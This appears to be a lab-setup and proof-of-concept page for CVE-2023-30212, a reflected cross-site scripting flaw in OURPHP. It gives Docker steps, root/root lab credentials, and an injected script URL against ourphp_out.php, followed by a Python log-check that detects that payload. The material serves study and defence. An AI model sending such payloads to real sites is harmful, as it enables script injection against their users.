CVE-2023-30212 PoC — OURPHP Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
Title: OURPHP Cross-Site Scripting Vulnerability (CVE-2023-30212)
Description: OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
Readme
# CVE-2023-30212 LAB SETUP

<b>Prerequisite</b><br>
  Install docker.io: <br>
 `sudo apt install -y docker.io`

<br>
<u>STEPS</u>

1. Download all files from my repository using the command below.<br>
   `git clone https://github.com/AAsh035/CVE-2023-30212.git`<br>
2. Build the Docker image with the following command:<br>
   `sudo docker build -t vuln .`<br>
3. Start a container from the image. The container needs to run on port 80. The command is:<br>
   `sudo docker run -d -p 80:80 vuln`<br>
4. To check that the container is up, use the command:<br>
   `sudo docker ps`<br>
5. Open 127.0.0.1 in the browser and an OURPHP page will load.
6. Configure OURPHP with the following:<br>
   Username: root<br>
   Password: root<br>
   Database Name: vuln

7. Now configure the username and password for the administrative account. Set the following:<br>
   Username: root<br>
   Password: root

8. Now copy the link below and paste it into the browser:<br>
   `http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>`


   


https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0
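
A log check for the request in step 8, added here as an example and not part of the original repository: it flags access-log entries for `/client/manage/ourphp_out.php` whose decoded `out` parameter contains markup or quote characters. The combined log format, the sample lines, and the benign `out=index` value are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path named in the CVE description above.
VULN_PATH = "/client/manage/ourphp_out.php"
# Markup and quote characters that can break out of an HTML or script context.
MARKUP = re.compile(r"[<>\"'`]")
# Client address and request target from a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2023:10:00:00 +0000] "GET /client/manage/ourphp_out.php'
    '?ourphp_admin=logout&out=%3C/script%3E%3Cscript%3Ealert(%22bug%22)%3C/script%3E'
    ' HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jun/2023:10:01:00 +0000] "GET /client/manage/ourphp_out.php'
    '?ourphp_admin=logout&out=index HTTP/1.1" 200 498',
    '192.0.2.1 - - [01/Jun/2023:10:02:00 +0000] "GET /index.php?out=%3Cb%3E HTTP/1.1" 200 90',
]


def suspicious_requests(lines):
    """Return (client, decoded_out) for hits on VULN_PATH whose `out` carries markup."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the assumed format
        client, target = match.groups()
        url = urlsplit(target)
        if url.path.lower() != VULN_PATH:
            continue  # only the script named in the advisory is of interest
        # parse_qs percent-decodes each value, so %3C is compared as "<".
        for value in parse_qs(url.query, keep_blank_values=True).get("out", []):
            if MARKUP.search(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent markup in 'out': {value!r}")
```
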
